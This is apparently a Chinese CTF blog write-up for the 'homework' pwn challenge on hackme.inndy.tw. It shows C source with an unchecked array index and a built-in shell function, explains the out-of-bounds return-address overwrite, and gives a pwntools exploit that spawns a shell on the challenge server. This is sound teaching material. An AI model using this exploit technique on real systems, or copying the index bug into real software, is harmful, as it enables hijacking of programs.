本文最后更新于:星期三, 一月 2日 2019, 4:15 下午
题目:homework (hackme.inndy.tw)
hint: Index out bound ,return address ,并且给了程序源码
题目防护机制:
开启了NX和Canary
源码:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char name[1024];
void call_me_maybe()
{
system("/bin/sh");
}
void unbuffer_io()
{
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
}
void set_timeout()
{
alarm(120);
}
void ask_name()
{
printf("What's your name? ");
gets(name);
}
void say_goodbye()
{
printf("Goodbye, %s\n", name);
}
void run_program()
{
int arr[10], i, v, act;
for(i = 0; i < 10; i++)
arr[i] = 0;
while(1) {
puts("0 > exit");
puts("1 > edit number");
puts("2 > show number");
puts("3 > sum");
puts("4 > dump all numbers");
printf(" > ");
scanf("%d", &act);
switch(act) {
case 0:
return;
case 1:
printf("Index to edit: ");
scanf("%d", &i);
printf("How many? ");
scanf("%d", &v);
arr[i] = v;
break;
case 2:
printf("Index to show: ");
scanf("%d", &i);
printf("arr[%d] is %d\n", i, arr[i]);
break;
case 3:
v = 0;
for(i = 0; i < 10; i++)
v += arr[i];
printf("Sum is %d\n", v);
break;
case 4:
for(i = 0; i < 10; i++)
printf("arr[%d] is %d\n", i, arr[i]);
break;
}
}
}
int main()
{
set_timeout();
unbuffer_io();
ask_name();
run_program();
say_goodbye();
return 0;
}
通过阅读它的源码可以发现它对数组的下标没有很好的限制,我们可以通过输入一个数组下标和值来改表数组的值,如果输入的数组下标超出了程序数组的大小,就可以改写内存中的值。同时,它程序中存在system函数,结合题目的hint可以推断出这是一个数组下标溢出题,通过下标溢出,将返回地址覆盖成system函数来获取shell
数组下标溢出原理:因为c语言不会检测数组下标,所以如果我们给数组一个超出它大小的下标,就会照成数组越界。如果是想数组中写入数据的话,就会造成数据写入到不属于数组的地方,或者说如果读取数据的话,就会读取到别的地方的数据。
因为数组地址是自低往高增长,而栈的地址是自高向下降低,所以如果我们将数组下标根据栈内的空间的分布,设置为特定的值,就可以修改或者是查看我们想要查看的地址的值。比如将返回地址设置成我们想要调用函数的地址。
具体可以参考这篇博客
所以只要找到返回地址对应着数组的位置是什么,再通过edit功能将返回地址修改为system函数的地址来获取shell
数组在栈中的位置是0x34,和返回地址的距离是0x34+8
所以输入的数组下标为14
exp:
from pwn import*
context.log_level="debug"
#p = process('./homework')
p = remote('hackme.inndy.tw', 7701)
p.recvuntil("What's your name?")
p.sendline('aaaa')
p.recvuntil(" > ")
p.sendline("1")
p.recv()
p.sendline("14")
p.recvuntil("How many?")
p.sendline(str(0x080485fb))
p.recv()
p.sendline("0")#make program return to target function
p.interactive()
hackme.inndy_writeup writeup pwn
本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!